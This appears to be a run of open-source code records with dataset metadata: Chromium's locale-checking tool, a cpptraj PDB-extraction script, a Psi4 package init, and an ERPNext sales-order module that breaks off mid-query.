lines = _AddMissingLocalesInGrdAndroidOutputs(
input_file, lines, wanted_locales)
elif _IsBuildGnInputFile(input_file):
lines = _AddMissingLocalesInGnAndroidOutputs(
input_file, input_lines, wanted_locales)
return lines
##########################################################################
##########################################################################
#####
##### C O M M A N D H A N D L I N G
#####
##########################################################################
##########################################################################
class _Command(object):
"""A base class for all commands recognized by this script.
Usage is the following:
1) Derived classes must re-define the following class-based fields:
- name: Command name (e.g. 'list-locales')
- description: Command short description.
- long_description: Optional. Command long description.
NOTE: As a convenience, if the first character is a newline,
it will be omitted in the help output.
2) Derived classes for commands that take arguments should override
RegisterExtraArgs(), which receives a corresponding argparse
sub-parser as argument.
3) Derived classes should implement a Run() command, which can read
the current arguments from self.args.
"""
name = None
description = None
long_description = None
def __init__(self):
self._parser = None
self.args = None
def RegisterExtraArgs(self, subparser):
pass
def RegisterArgs(self, parser):
subp = parser.add_parser(
self.name, help=self.description,
description=self.long_description or self.description,
formatter_class=argparse.RawDescriptionHelpFormatter)
self._parser = subp
subp.set_defaults(command=self)
group = subp.add_argument_group('%s arguments' % self.name)
self.RegisterExtraArgs(group)
def ProcessArgs(self, args):
self.args = args
class _ListLocalesCommand(_Command):
"""Implement the 'list-locales' command to list locale lists of interest."""
name = 'list-locales'
description = 'List supported Chrome locales'
long_description = r'''
List locales of interest, by default this prints all locales supported by
Chrome, but `--type=android_apk_omitted` can be used to print the list of
locales omitted from Android APKs (but not app bundles), and
`--type=ios_unsupported` for the list of locales unsupported on iOS.
These values are extracted directly from build/config/locales.gni.
Additionally, use the --as-json argument to print the list as a JSON list,
instead of the default format (which is a space-separated list of locale names).
'''
# Maps type argument to a function returning the corresponding locales list.
TYPE_MAP = {
'all': ChromeLocales,
'android_apk_omitted': AndroidAPKOmittedLocales,
'ios_unsupported': IosUnsupportedLocales,
}
def RegisterExtraArgs(self, group):
group.add_argument(
'--as-json',
action='store_true',
help='Output as JSON list.')
group.add_argument(
'--type',
choices=tuple(self.TYPE_MAP.viewkeys()),
default='all',
help='Select type of locale list to print.')
def Run(self):
locale_list = self.TYPE_MAP[self.args.type]()
if self.args.as_json:
print('[%s]' % ", ".join("'%s'" % loc for loc in locale_list))
else:
print(' '.join(locale_list))
class _CheckInputFileBaseCommand(_Command):
"""Used as a base for other _Command subclasses that check input files.
Subclasses should also define the following class-level variables:
- select_file_func:
A predicate that receives a file name (not path) and return True if it
should be selected for inspection. Used when scanning directories with
'--scan-dir <dir>'.
- check_func:
- fix_func:
Two functions passed as parameters to _ProcessFile(), see relevant
documentation in this function's definition.
"""
select_file_func = None
check_func = None
fix_func = None
def RegisterExtraArgs(self, group):
group.add_argument(
'--scan-dir',
action='append',
help='Optional directory to scan for input files recursively.')
group.add_argument(
'input',
nargs='*',
help='Input file(s) to check.')
group.add_argument(
'--fix-inplace',
action='store_true',
help='Try to fix the files in-place too.')
group.add_argument(
'--add-locales',
help='Space-separated list of additional locales to use')
def Run(self):
args = self.args
input_files = []
if args.input:
input_files = args.input
if args.scan_dir:
input_files.extend(_ScanDirectoriesForFiles(
args.scan_dir, self.select_file_func.__func__))
locales = ChromeLocales()
if args.add_locales:
locales.extend(args.add_locales.split(' '))
locales = set(locales)
for input_file in input_files:
_ProcessFile(input_file,
locales,
self.check_func.__func__,
self.fix_func.__func__ if args.fix_inplace else None)
print('%sDone.' % (_CONSOLE_START_LINE))
class _CheckGrdAndroidOutputsCommand(_CheckInputFileBaseCommand):
name = 'check-grd-android-outputs'
description = (
'Check the Android resource (.xml) files outputs in GRIT input files.')
long_description = r'''
Check the Android .xml files outputs in one or more input GRIT (.grd) files
for the following conditions:
- Each item has a correct 'lang' attribute.
- There are no duplicated lines for the same 'lang' attribute.
- That there are no extra locales that Chromium doesn't want.
- That no wanted locale is missing.
- Filenames exist for each listed locale.
- Filenames are well-formed.
'''
select_file_func = _IsGritInputFile
check_func = _CheckGrdAndroidOutputElements
fix_func = _AddMissingLocalesInGrdAndroidOutputs
class _CheckGrdTranslationsCommand(_CheckInputFileBaseCommand):
name = 'check-grd-translations'
description = (
'Check the translation (.xtb) files outputted by .grd input files.')
long_description = r'''
Check the translation (.xtb) file outputs in one or more input GRIT (.grd) files
for the following conditions:
- Each item has a correct 'lang' attribute.
- There are no duplicated lines for the same 'lang' attribute.
- That there are no extra locales that Chromium doesn't want.
- That no wanted locale is missing.
- Each item has a 'path' attribute.
- Each such path value ends up with '.xtb'.
'''
select_file_func = _IsGritInputFile
check_func = _CheckGrdTranslations
fix_func = _AddMissingLocalesInGrdTranslations
class _CheckGnAndroidOutputsCommand(_CheckInputFileBaseCommand):
name = 'check-gn-android-outputs'
description = 'Check the Android .xml file lists in GN build files.'
long_description = r'''
Check one or more BUILD.gn file, looking for lists of Android resource .xml
files, and checking that:
- There are no duplicated output files in the list.
- Each output file belongs to a wanted Chromium locale.
- There are no output files for unwanted Chromium locales.
'''
select_file_func = _IsBuildGnInputFile
check_func = _CheckGnAndroidOutputs
fix_func = _AddMissingLocalesInGnAndroidOutputs
class _CheckAllCommand(_CheckInputFileBaseCommand):
name = 'check-all'
description = 'Check everything.'
long_description = 'Equivalent to calling all other check-xxx commands.'
select_file_func = _IsAllInputFile
check_func = _CheckAllFiles
fix_func = _AddMissingLocalesInAllFiles
class _UpdateExpectationsCommand(_Command):
name = 'update-expectations'
description = 'Update translation expectations file.'
long_description = r'''
Update %s files to match the current list of locales supported by Chromium.
This is especially useful to add new locales before updating any GRIT or GN
input file with the --add-locales option.
''' % _EXPECTATIONS_FILENAME
def RegisterExtraArgs(self, group):
group.add_argument(
'--add-locales',
help='Space-separated list of additional locales to use.')
def Run(self):
locales = ChromeLocales()
add_locales = self.args.add_locales
if add_locales:
locales.extend(add_locales.split(' '))
expectation_paths = [
'tools/gritsettings/translation_expectations.pyl',
'clank/tools/translation_expectations.pyl',
]
missing_expectation_files = []
for path in enumerate(expectation_paths):
file_path = os.path.join(_TOP_SRC_DIR, path)
if not os.path.exists(file_path):
missing_expectation_files.append(file_path)
continue
_UpdateLocalesInExpectationFile(file_path, locales)
if missing_expectation_files:
sys.stderr.write('WARNING: Missing file(s): %s\n' %
(', '.join(missing_expectation_files)))
class _UnitTestsCommand(_Command):
name = 'unit-tests'
description = 'Run internal unit-tests for this script'
def RegisterExtraArgs(self, group):
group.add_argument(
'-v', '--verbose', action='count', help='Increase test verbosity.')
group.add_argument('args', nargs=argparse.REMAINDER)
def Run(self):
argv = [_SCRIPT_NAME] + self.args.args
unittest.main(argv=argv, verbosity=self.args.verbose)
# List of all commands supported by this script.
_COMMANDS = [
_ListLocalesCommand,
_CheckGrdAndroidOutputsCommand,
_CheckGrdTranslationsCommand,
_CheckGnAndroidOutputsCommand,
_CheckAllCommand,
_UpdateExpectationsCommand,
_UnitTestsCommand,
]
def main(argv):
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
subparsers = parser.add_subparsers()
commands = [clazz() for clazz in _COMMANDS]
for command in commands:
command.RegisterArgs(subparsers)
if not argv:
argv = ['--help']
args = parser.parse_args(argv)
args.command.ProcessArgs(args)
args.command.Run()
if __name__ == "__main__":
main(sys.argv[1:])
|
endlessm/chromium-browser
|
build/locale_tool.py
|
Python
|
bsd-3-clause
| 51,300
|
[
"xTB"
] |
35646385c45a01ee503db530012c4f2c53b7a5870acf1bdfd5456f7c0ba3d26c
|
#!/usr/bin/env python
"""
MakePDB
---------
title parm mdtraj
"""
import sys
def makepdb(title,parm,traj):
"""
Make pdb file from first frame of a trajectory
"""
cpptrajdic ={'title':title,'parm':parm,'traj':traj}
cpptrajscript="""parm {parm}
trajin {traj} 0 1 1
center
rms first @CA,C,N
strip :WAT
strip :Na+
strip :Cl-
trajout {title}.pdb pdb
run
exit"""
return cpptrajscript.format(**cpptrajdic)
if __name__ == "__main__":
if len(sys.argv) < 2:
print __doc__
exit()
title = sys.argv[1]
parm = sys.argv[2]
mdtrj = sys.argv[3]
script = makepdb(title,parm,mdtrj)
with open('getpdb.cpptraj','w') as outfile:
print "Writing getpdb file"
outfile.write(script)
|
avishek-r-kumar/dfitools
|
MD_DFI_analysis/makepdb.py
|
Python
|
bsd-3-clause
| 787
|
[
"MDTraj"
] |
7ddbd25e54838822d770833142b5013e6127082e1207b99d771ec6aa9c780c41
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2022 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
from .mcscf_solver import mcscf_solver
|
psi4/psi4
|
psi4/driver/procrouting/mcscf/__init__.py
|
Python
|
lgpl-3.0
| 953
|
[
"Psi4"
] |
97f635de6e6cc1a6fe4487c195f342a11f6b83f0d3cf577804961c69f6f7f352
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import json
import frappe.utils
from frappe.utils import cstr, flt, getdate, comma_and, cint
from frappe import _
from frappe.model.utils import get_fetch_values
from frappe.model.mapper import get_mapped_doc
from erpnext.stock.stock_balance import update_bin_qty, get_reserved_qty
from frappe.desk.notifications import clear_doctype_notifications
from frappe.contacts.doctype.address.address import get_company_address
from erpnext.controllers.selling_controller import SellingController
from erpnext.subscription.doctype.subscription.subscription import month_map, get_next_date
form_grid_templates = {
"items": "templates/form_grid/item_grid.html"
}
class WarehouseRequired(frappe.ValidationError): pass
class SalesOrder(SellingController):
def __init__(self, arg1, arg2=None):
super(SalesOrder, self).__init__(arg1, arg2)
def validate(self):
super(SalesOrder, self).validate()
self.validate_order_type()
self.validate_delivery_date()
self.validate_proj_cust()
self.validate_po()
self.validate_uom_is_integer("stock_uom", "stock_qty")
self.validate_uom_is_integer("uom", "qty")
self.validate_for_items()
self.validate_warehouse()
self.validate_drop_ship()
from erpnext.stock.doctype.packed_item.packed_item import make_packing_list
make_packing_list(self)
self.validate_with_previous_doc()
self.set_status()
if not self.billing_status: self.billing_status = 'Not Billed'
if not self.delivery_status: self.delivery_status = 'Not Delivered'
def validate_po(self):
# validate p.o date v/s delivery date
if self.po_date:
for d in self.get("items"):
if d.delivery_date and getdate(self.po_date) > getdate(d.delivery_date):
frappe.throw(_("Row #{0}: Expected Delivery Date cannot be before Purchase Order Date")
.format(d.idx))
if self.po_no and self.customer:
so = frappe.db.sql("select name from `tabSales Order` \
where ifnull(po_no, '') = %s and name != %s and docstatus < 2\
and customer = %s", (self.po_no, self.name, self.customer))
if so and so[0][0] and not cint(frappe.db.get_single_value("Selling Settings",
"allow_against_multiple_purchase_orders")):
frappe.msgprint(_("Warning: Sales Order {0} already exists against Customer's Purchase Order {1}").format(so[0][0], self.po_no))
def validate_for_items(self):
check_list = []
for d in self.get('items'):
check_list.append(cstr(d.item_code))
# used for production plan
d.transaction_date = self.transaction_date
tot_avail_qty = frappe.db.sql("select projected_qty from `tabBin` \
where item_code = %s and warehouse = %s", (d.item_code, d.warehouse))
d.projected_qty = tot_avail_qty and flt(tot_avail_qty[0][0]) or 0
# check for same entry multiple times
unique_chk_list = set(check_list)
if len(unique_chk_list) != len(check_list) and \
not cint(frappe.db.get_single_value("Selling Settings", "allow_multiple_items")):
frappe.msgprint(_("Same item has been entered multiple times"),
title=_("Warning"), indicator='orange')
def product_bundle_has_stock_item(self, product_bundle):
"""Returns true if product bundle has stock item"""
ret = len(frappe.db.sql("""select i.name from tabItem i, `tabProduct Bundle Item` pbi
where pbi.parent = %s and pbi.item_code = i.name and i.is_stock_item = 1""", product_bundle))
return ret
def validate_sales_mntc_quotation(self):
for d in self.get('items'):
if d.prevdoc_docname:
res = frappe.db.sql("select name from `tabQuotation` where name=%s and order_type = %s",
(d.prevdoc_docname, self.order_type))
if not res:
frappe.msgprint(_("Quotation {0} not of type {1}")
.format(d.prevdoc_docname, self.order_type))
def validate_order_type(self):
super(SalesOrder, self).validate_order_type()
def validate_delivery_date(self):
if self.order_type == 'Sales':
if not self.delivery_date:
self.delivery_date = max([d.delivery_date for d in self.get("items")])
if self.delivery_date:
for d in self.get("items"):
if not d.delivery_date:
d.delivery_date = self.delivery_date
if getdate(self.transaction_date) > getdate(d.delivery_date):
frappe.msgprint(_("Expected Delivery Date should be after Sales Order Date"),
indicator='orange', title=_('Warning'))
else:
frappe.throw(_("Please enter Delivery Date"))
self.validate_sales_mntc_quotation()
def validate_proj_cust(self):
if self.project and self.customer_name:
res = frappe.db.sql("""select name from `tabProject` where name = %s
and (customer = %s or ifnull(customer,'')='')""",
(self.project, self.customer))
if not res:
frappe.throw(_("Customer {0} does not belong to project {1}").format(self.customer, self.project))
def validate_warehouse(self):
super(SalesOrder, self).validate_warehouse()
for d in self.get("items"):
if (frappe.db.get_value("Item", d.item_code, "is_stock_item") == 1 or
(self.has_product_bundle(d.item_code) and self.product_bundle_has_stock_item(d.item_code))) \
and not d.warehouse and not cint(d.delivered_by_supplier):
frappe.throw(_("Delivery warehouse required for stock item {0}").format(d.item_code),
WarehouseRequired)
def validate_with_previous_doc(self):
super(SalesOrder, self).validate_with_previous_doc({
"Quotation": {
"ref_dn_field": "prevdoc_docname",
"compare_fields": [["company", "="], ["currency", "="]]
}
})
def update_enquiry_status(self, prevdoc, flag):
enq = frappe.db.sql("select t2.prevdoc_docname from `tabQuotation` t1, `tabQuotation Item` t2 where t2.parent = t1.name and t1.name=%s", prevdoc)
if enq:
frappe.db.sql("update `tabOpportunity` set status = %s where name=%s",(flag,enq[0][0]))
def update_prevdoc_status(self, flag):
for quotation in list(set([d.prevdoc_docname for d in self.get("items")])):
if quotation:
doc = frappe.get_doc("Quotation", quotation)
if doc.docstatus==2:
frappe.throw(_("Quotation {0} is cancelled").format(quotation))
doc.set_status(update=True)
doc.update_opportunity()
def validate_drop_ship(self):
for d in self.get('items'):
if d.delivered_by_supplier and not d.supplier:
frappe.throw(_("Row #{0}: Set Supplier for item {1}").format(d.idx, d.item_code))
def on_submit(self):
self.check_credit_limit()
self.update_reserved_qty()
frappe.get_doc('Authorization Control').validate_approving_authority(self.doctype, self.company, self.base_grand_total, self)
self.update_project()
self.update_prevdoc_status('submit')
def on_cancel(self):
# Cannot cancel closed SO
if self.status == 'Closed':
frappe.throw(_("Closed order cannot be cancelled. Unclose to cancel."))
self.check_nextdoc_docstatus()
self.update_reserved_qty()
self.update_project()
self.update_prevdoc_status('cancel')
frappe.db.set(self, 'status', 'Cancelled')
def update_project(self):
project_list = []
if self.project:
project = frappe.get_doc("Project", self.project)
project.flags.dont_sync_tasks = True
project.update_sales_costing()
project.save()
project_list.append(self.project)
def check_credit_limit(self):
from erpnext.selling.doctype.customer.customer import check_credit_limit
check_credit_limit(self.customer, self.company)
def check_nextdoc_docstatus(self):
# Checks Delivery Note
submit_dn = frappe.db.sql_list("""select t1.name from `tabDelivery Note` t1,`tabDelivery Note Item` t2
where t1.name = t2.parent and t2.against_sales_order = %s and t1.docstatus = 1""", self.name)
if submit_dn:
frappe.throw(_("Delivery Notes {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_dn)))
# Checks Sales Invoice
submit_rv = frappe.db.sql_list("""select t1.name
from `tabSales Invoice` t1,`tabSales Invoice Item` t2
where t1.name = t2.parent and t2.sales_order = %s and t1.docstatus = 1""",
self.name)
if submit_rv:
frappe.throw(_("Sales Invoice {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_rv)))
#check maintenance schedule
submit_ms = frappe.db.sql_list("""select t1.name from `tabMaintenance Schedule` t1,
`tabMaintenance Schedule Item` t2
where t2.parent=t1.name and t2.sales_order = %s and t1.docstatus = 1""", self.name)
if submit_ms:
frappe.throw(_("Maintenance Schedule {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_ms)))
# check maintenance visit
submit_mv = frappe.db.sql_list("""select t1.name from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2
where t2.parent=t1.name and t2.prevdoc_docname = %s and t1.docstatus = 1""",self.name)
if submit_mv:
frappe.throw(_("Maintenance Visit {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_mv)))
# check production order
pro_order = frappe.db.sql_list("""select name from `tabProduction Order`
where sales_order = %s and docstatus = 1""", self.name)
if pro_order:
frappe.throw(_("Production Order {0} must be cancelled before cancelling this Sales Order").format(comma_and(pro_order)))
def check_modified_date(self):
mod_db = frappe.db.get_value("Sales Order", self.name, "modified")
date_diff = frappe.db.sql("select TIMEDIFF('%s', '%s')" %
( mod_db, cstr(self.modified)))
if date_diff and date_diff[0][0]:
frappe.throw(_("{0} {1} has been modified. Please refresh.").format(self.doctype, self.name))
def update_status(self, status):
self.check_modified_date()
self.set_status(update=True, status=status)
self.update_reserved_qty()
self.notify_update()
clear_doctype_notifications(self)
def update_reserved_qty(self, so_item_rows=None):
"""update requested qty (before ordered_qty is updated)"""
item_wh_list = []
def _valid_for_reserve(item_code, warehouse):
if item_code and warehouse and [item_code, warehouse] not in item_wh_list \
and frappe.db.get_value("Item", item_code, "is_stock_item"):
item_wh_list.append([item_code, warehouse])
for d in self.get("items"):
if (not so_item_rows or d.name in so_item_rows) and not d.delivered_by_supplier:
if self.has_product_bundle(d.item_code):
for p in self.get("packed_items"):
if p.parent_detail_docname == d.name and p.parent_item == d.item_code:
_valid_for_reserve(p.item_code, p.warehouse)
else:
_valid_for_reserve(d.item_code, d.warehouse)
for item_code, warehouse in item_wh_list:
update_bin_qty(item_code, warehouse, {
"reserved_qty": get_reserved_qty(item_code, warehouse)
})
def on_update(self):
pass
def before_update_after_submit(self):
self.validate_po()
self.validate_drop_ship()
self.validate_supplier_after_submit()
def validate_supplier_after_submit(self):
"""Check that supplier is the same after submit if PO is already made"""
exc_list = []
for item in self.items:
if item.supplier:
supplier = frappe.db.get_value("Sales Order Item", {"parent": self.name, "item_code": item.item_code},
"supplier")
if item.ordered_qty > 0.0 and item.supplier != supplier:
exc_list.append(_("Row #{0}: Not allowed to change Supplier as Purchase Order already exists").format(item.idx))
if exc_list:
frappe.throw('\n'.join(exc_list))
def update_delivery_status(self):
"""Update delivery status from Purchase Order for drop shipping"""
tot_qty, delivered_qty = 0.0, 0.0
for item in self.items:
if item.delivered_by_supplier:
item_delivered_qty = frappe.db.sql("""select sum(qty)
from `tabPurchase Order Item` poi, `tabPurchase Order` po
where poi.sales_order_item = %s
and poi.item_code = %s
and poi.parent = po.name
and po.docstatus = 1
and po.status = 'Delivered'""", (item.name, item.item_code))
item_delivered_qty = item_delivered_qty[0][0] if item_delivered_qty else 0
item.db_set("delivered_qty", flt(item_delivered_qty), update_modified=False)
delivered_qty += item.delivered_qty
tot_qty += item.qty
self.db_set("per_delivered", flt(delivered_qty/tot_qty) * 100,
update_modified=False)
def set_indicator(self):
"""Set indicator for portal"""
if self.per_billed < 100 and self.per_delivered < 100:
self.indicator_color = "orange"
self.indicator_title = _("Not Paid and Not Delivered")
elif self.per_billed == 100 and self.per_delivered < 100:
self.indicator_color = "orange"
self.indicator_title = _("Paid and Not Delivered")
else:
self.indicator_color = "green"
self.indicator_title = _("Paid")
def get_production_order_items(self):
'''Returns items with BOM that already do not have a linked production order'''
items = []
for table in [self.items, self.packed_items]:
for i in table:
bom = get_default_bom_item(i.item_code)
if bom:
stock_qty = i.qty if i.doctype == 'Packed Item' else i.stock_qty
items.append(dict(
item_code= i.item_code,
bom = bom,
warehouse = i.warehouse,
pending_qty= stock_qty - flt(frappe.db.sql('''select sum(qty) from `tabProduction Order`
where production_item=%s and sales_order=%s''', (i.item_code, self.name))[0][0])
))
return items
def on_recurring(self, reference_doc, subscription_doc):
mcount = month_map[subscription_doc.frequency]
self.set("delivery_date", get_next_date(reference_doc.delivery_date, mcount,
cint(subscription_doc.repeat_on_day)))
for d in self.get("items"):
reference_delivery_date = frappe.db.get_value("Sales Order Item",
{"parent": reference_doc.name, "item_code": d.item_code, "idx": d.idx}, "delivery_date")
d.set("delivery_date",
get_next_date(reference_delivery_date, mcount, cint(subscription_doc.repeat_on_day)))
def get_list_context(context=None):
from erpnext.controllers.website_list_for_contact import get_list_context
list_context = get_list_context(context)
list_context.update({
'show_sidebar': True,
'show_search': True,
'no_breadcrumbs': True,
'title': _('Orders'),
})
return list_context
@frappe.whitelist()
def close_or_unclose_sales_orders(names, status):
if not frappe.has_permission("Sales Order", "write"):
frappe.throw(_("Not permitted"), frappe.PermissionError)
names = json.loads(names)
for name in names:
so = frappe.get_doc("Sales Order", name)
if so.docstatus == 1:
if status == "Closed":
if so.status not in ("Cancelled", "Closed") and (so.per_delivered < 100 or so.per_billed < 100):
so.update_status(status)
else:
if so.status == "Closed":
so.update_status('Draft')
frappe.local.message_log = []
@frappe.whitelist()
def make_material_request(source_name, target_doc=None):
def postprocess(source, doc):
doc.material_request_type = "Purchase"
def update_item(source, target, source_parent):
target.project = source_parent.project
doc = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Material Request",
"validation": {
"docstatus": ["=", 1]
}
},
"Packed Item": {
"doctype": "Material Request Item",
"field_map": {
"parent": "sales_order",
"stock_uom": "uom"
},
"postprocess": update_item
},
"Sales Order Item": {
"doctype": "Material Request Item",
"field_map": {
"parent": "sales_order",
"stock_uom": "uom",
"stock_qty": "qty"
},
"condition": lambda doc: not frappe.db.exists('Product Bundle', doc.item_code),
"postprocess": update_item
}
}, target_doc, postprocess)
return doc
@frappe.whitelist()
def make_project(source_name, target_doc=None):
def postprocess(source, doc):
doc.project_type = "External"
doc.project_name = source.name
doc = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Project",
"validation": {
"docstatus": ["=", 1]
},
"field_map":{
"name" : "sales_order",
"base_grand_total" : "estimated_costing",
}
},
"Sales Order Item": {
"doctype": "Project Task",
"field_map": {
"description": "title",
},
}
}, target_doc, postprocess)
return doc
@frappe.whitelist()
def make_delivery_note(source_name, target_doc=None):
def set_missing_values(source, target):
if source.po_no:
if target.po_no:
target_po_no = target.po_no.split(", ")
target_po_no.append(source.po_no)
target.po_no = ", ".join(list(set(target_po_no))) if len(target_po_no) > 1 else target_po_no[0]
else:
target.po_no = source.po_no
target.ignore_pricing_rule = 1
target.run_method("set_missing_values")
target.run_method("calculate_taxes_and_totals")
# set company address
target.update(get_company_address(target.company))
if target.company_address:
target.update(get_fetch_values("Delivery Note", 'company_address', target.company_address))
def update_item(source, target, source_parent):
target.base_amount = (flt(source.qty) - flt(source.delivered_qty)) * flt(source.base_rate)
target.amount = (flt(source.qty) - flt(source.delivered_qty)) * flt(source.rate)
target.qty = flt(source.qty) - flt(source.delivered_qty)
item = frappe.db.get_value("Item", target.item_code, ["item_group", "selling_cost_center"], as_dict=1)
target.cost_center = frappe.db.get_value("Project", source_parent.project, "cost_center") \
or item.selling_cost_center \
or frappe.db.get_value("Item Group", item.item_group, "default_cost_center")
target_doc = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Delivery Note",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Delivery Note Item",
"field_map": {
"rate": "rate",
"name": "so_detail",
"parent": "against_sales_order",
},
"postprocess": update_item,
"condition": lambda doc: abs(doc.delivered_qty) < abs(doc.qty) and doc.delivered_by_supplier!=1
},
"Sales Taxes and Charges": {
"doctype": "Sales Taxes and Charges",
"add_if_empty": True
},
"Sales Team": {
"doctype": "Sales Team",
"add_if_empty": True
}
}, target_doc, set_missing_values)
return target_doc
@frappe.whitelist()
def make_sales_invoice(source_name, target_doc=None, ignore_permissions=False):
def postprocess(source, target):
set_missing_values(source, target)
#Get the advance paid Journal Entries in Sales Invoice Advance
target.set_advances()
def set_missing_values(source, target):
target.is_pos = 0
target.ignore_pricing_rule = 1
target.flags.ignore_permissions = True
target.run_method("set_missing_values")
target.run_method("calculate_taxes_and_totals")
# set company address
target.update(get_company_address(target.company))
if target.company_address:
target.update(get_fetch_values("Sales Invoice", 'company_address', target.company_address))
def update_item(source, target, source_parent):
target.amount = flt(source.amount) - flt(source.billed_amt)
target.base_amount = target.amount * flt(source_parent.conversion_rate)
target.qty = target.amount / flt(source.rate) if (source.rate and source.billed_amt) else source.qty
item = frappe.db.get_value("Item", target.item_code, ["item_group", "selling_cost_center"], as_dict=1)
target.cost_center = frappe.db.get_value("Project", source_parent.project, "cost_center") \
or item.selling_cost_center \
or frappe.db.get_value("Item Group", item.item_group, "default_cost_center")
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Sales Invoice",
"field_map": {
"party_account_currency": "party_account_currency"
},
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Sales Invoice Item",
"field_map": {
"name": "so_detail",
"parent": "sales_order",
},
"postprocess": update_item,
"condition": lambda doc: doc.qty and (doc.base_amount==0 or abs(doc.billed_amt) < abs(doc.amount))
},
"Sales Taxes and Charges": {
"doctype": "Sales Taxes and Charges",
"add_if_empty": True
},
"Sales Team": {
"doctype": "Sales Team",
"add_if_empty": True
}
}, target_doc, postprocess, ignore_permissions=ignore_permissions)
return doclist
@frappe.whitelist()
def make_maintenance_schedule(source_name, target_doc=None):
maint_schedule = frappe.db.sql("""select t1.name
from `tabMaintenance Schedule` t1, `tabMaintenance Schedule Item` t2
where t2.parent=t1.name and t2.sales_order=%s and t1.docstatus=1""", source_name)
if not maint_schedule:
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Maintenance Schedule",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Maintenance Schedule Item",
"field_map": {
"parent": "sales_order"
},
"add_if_empty": True
}
}, target_doc)
return doclist
@frappe.whitelist()
def make_maintenance_visit(source_name, target_doc=None):
visit = frappe.db.sql("""select t1.name
from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2
where t2.parent=t1.name and t2.prevdoc_docname=%s
and t1.docstatus=1 and t1.completion_status='Fully Completed'""", source_name)
if not visit:
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Maintenance Visit",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Maintenance Visit Purpose",
"field_map": {
"parent": "prevdoc_docname",
"parenttype": "prevdoc_doctype"
},
"add_if_empty": True
}
}, target_doc)
return doclist
@frappe.whitelist()
def get_events(start, end, filters=None):
"""Returns events for Gantt / Calendar view rendering.
:param start: Start date-time.
:param end: End date-time.
:param filters: Filters (JSON).
"""
from frappe.desk.calendar import get_event_conditions
conditions = get_event_conditions("Sales Order", filters)
data = frappe.db.sql("""
select
`tabSales Order`.name, `tabSales Order`.customer_name, `tabSales Order`.status,
`tabSales Order`.delivery_status, `tabSales Order`.billing_status,
`tabSales Order Item`.delivery_date
from
`tabSales Order`, `tabSales Order Item`
where `tabSales Order`.name = `tabSales Order Item`.parent
and (ifnull(`tabSales Order Item`.delivery_date, '0000-00-00')!= '0000-00-00') \
and (`tabSales Order Item`.delivery_date between %(start)s and %(end)s)
and `tabSales Order`.docstatus < 2
{conditions}
""".format(conditions=conditions), {
"start": start,
"end": end
}, as_dict=True, update={"allDay": 0})
return data
@frappe.whitelist()
def make_purchase_order_for_drop_shipment(source_name, for_supplier, target_doc=None):
def set_missing_values(source, target):
target.supplier = for_supplier
target.apply_discount_on = ""
target.additional_discount_percentage = 0.0
target.discount_amount = 0.0
default_price_list = frappe.get_value("Supplier", for_supplier, "default_price_list")
if default_price_list:
target.buying_price_list = default_price_list
if any( item.delivered_by_supplier==1 for item in source.items):
if source.shipping_address_name:
target.shipping_address = source.shipping_address_name
target.shipping_address_display = source.shipping_address
else:
target.shipping_address = source.customer_address
target.shipping_address_display = source.address_display
target.customer_contact_person = source.contact_person
target.customer_contact_display = source.contact_display
target.customer_contact_mobile = source.contact_mobile
target.customer_contact_email = source.contact_email
else:
target.customer = ""
target.customer_name = ""
target.run_method("set_missing_values")
target.run_method("calculate_taxes_and_totals")
def update_item(source, target, source_parent):
target.schedule_date = source.delivery_date
target.qty = flt(source.qty) - flt(source.ordered_qty)
target.stock_qty = (flt(source.qty) - flt(source.ordered_qty)) * flt(source.conversion_factor)
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Purchase Order",
"field_no_map": [
"address_display",
"contact_display",
"contact_mobile",
"contact_email",
"contact_person"
],
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Purchase Order Item",
"field_map": [
["name", "sales_order_item"],
["parent", "sales_order"],
["stock_uom", "stock_uom"],
["uom", "uom"],
["conversion_factor", "conversion_factor"],
["delivery_date", "schedule_date"]
],
"field_no_map": [
"rate",
"price_list_rate"
],
"postprocess": update_item,
"condition": lambda doc: doc.ordered_qty < doc.qty and doc.supplier == for_supplier
}
}, target_doc, set_missing_values)
return doclist
@frappe.whitelist()
def get_supplier(doctype, txt, searchfield, start, page_len, filters):
supp_master_name = frappe.defaults.get_user_default("supp_master_name")
if supp_master_name == "Supplier Name":
fields = ["name", "supplier_type"]
else:
fields = ["name", "supplier_name", "supplier_type"]
fields = ", ".join(fields)
return frappe.db.sql("""select {field} from `tabSupplier`
where docstatus < 2
and ({key} like %(txt)s
or supplier_name like %(txt)s)
